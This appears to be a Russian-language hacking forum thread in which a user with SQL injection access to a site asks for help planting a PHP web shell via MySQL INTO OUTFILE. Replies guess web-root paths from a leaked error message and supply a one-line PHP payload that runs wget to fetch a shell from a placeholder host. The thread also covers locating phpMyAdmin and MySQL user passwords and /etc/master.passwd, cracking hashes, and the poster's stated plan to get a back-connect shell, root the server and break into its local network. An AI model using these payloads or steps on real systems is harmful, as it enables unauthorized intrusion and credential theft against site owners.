Есть проблема заливки шелла на один сайт.
Краткая предистрия....
Есть доступ к mysql от туда можно командой " 'SELECT 'злой пхп шелл' FROM таблица WHERE id=строка
into outfile 'путь к файлу' " загрузить данные с таблици в файл скажем /USR/LOCAL/путь где лежит наш сайт/myevilshell.php

и собственно сама проблема: Я нигде немогу узнать полный путь к директории сайта....

Опытные и знающие люди подскажите помогите что делать.


P.S.- подгрузить файл httpd.conf в таблицу мускула из апача прав нехватило

а там есть какие нить форумы или чаты, можно попробовать через них раскрыть полный путь

попробуй поискать какие либо баги. все намного было бы легче если была бы не слепая скуль..

Тебе нужно найти только багу а то ничего не сможешь сделать

Форумов и чатов там нет.
а багу нашел только одну

Warning: require(DB.php) [function.require]: failed to open stream: No such file or directory in /home/http/htdocs/library/includes/config.php on line 2

Fatal error: require() [function.require]: Failed opening required 'DB.php' (include_path='.:/usr/local/include/php/include/libs') in /home/http/htdocs/library/includes/config.php on line 2

может кто скажет чем мне это сможет помочь...??

Попробуй загрузи в /home/http/htdocs/library/includes/ авось прокатит.

Ну или в /home/http/htdocs/ или в /home/http/htdocs/library/ .

имхо /home/http/htdocs/ ..

Метод научного тыка... перепробовал.... заливал куда мог.... но всеравно не судьба. Может кто знает какойнить скульный запрос который покажет где путь лежит PhpMyadmin ???
тогда можно просто залить в дир майадмина...

Помогите... выложите пожалуйста ПХП скрипт который делает wget
ато уже сил нет пререписывать символы в шеле чтоб его мускул прохавал нормально....

<?system("wget http://site.com/shell.php");?>

))

Спасибки...

А, как что б загрул в другую директорию... ???

<?system("wget http://site.com/shell.php -O /директори/название_файла.php");?>

Загрузи и скопируй

Подскажите кто знает где хранятся пароли на phpmyadmin если auth_type http

Подскажите кто знает где хранятся пароли на phpmyadmin

config.inc.php

Какие файлы нужно просмотреть во FreeBSD для того что б увидеть пароли...
etc/passwd пароли закрыты звездочкой ????

/etc/master.passwd . Но и там они не в открытом виде :)

Lya--Lya, для рассшифровки юзай Join The Ripper

/etc/master.passwd грузить в таблицу не хочет... говорит что нет такого файла...
Может еще чегото есть где могут быть пароли...???

для рассшифровки юзай Join The Ripper
Что это и где такое взять ?

ребят.... я зашел в тупик... немогу доломать сайт кто может помочь просьба писать в аску 22554264.....
соррри что не в форуме просто не хочится калечить сайт цель совешенно другая....
Хочется организовать bacconnect с сервака, получить рут, поднять на фрихе впн и прорваться в локалку....

Кста... если не тяжело расскажите как правильно организовать бэкконнект... ато как то чувствую себя ламером

P.S.- подгрузить файл httpd.conf в таблицу мускула из апача прав нехватило
скорее всего и прав на запись не хватит тогда

Подскажите кто знает где хранятся пароли на phpmyadmin если auth_type http
если тип http то пароли могут(могут только а могут и нетолько ) хранится только в бд, а не в конфигах phpmyadmin, еслиб был тип config то в конфиге
P.S. единственное что можешь попробовать это если прав хватит на mysql.user узнать пароли от mysql и попробовать их на другие сервисы, хотя канечно некоторые могут одинаковые пароли иметь и на админку форума и на ftp но это эксклюзив.
PP.S хотя все это уже обжёвывалось раньше , надо наверно antichat в книгах выпускать :)

/etc/master.passwd грузить в таблицу не хочет... говорит что нет такого файла...
Может еще чегото есть где могут быть пароли...???
читать его может только root

получить рут
сомневаюсь, что у тебя получится поднять рут на фряхе :)

поднять на фрихе впн и прорваться в локалку....
тем более
нужен рут + хорошее знание ОС

лучше ssh тунель, для него и рут не обязателен )


вообщем для начала получи хотя бы веб шелл

можешь попробовать это если прав хватит на mysql.user узнать пароли
Где лежит этот файл????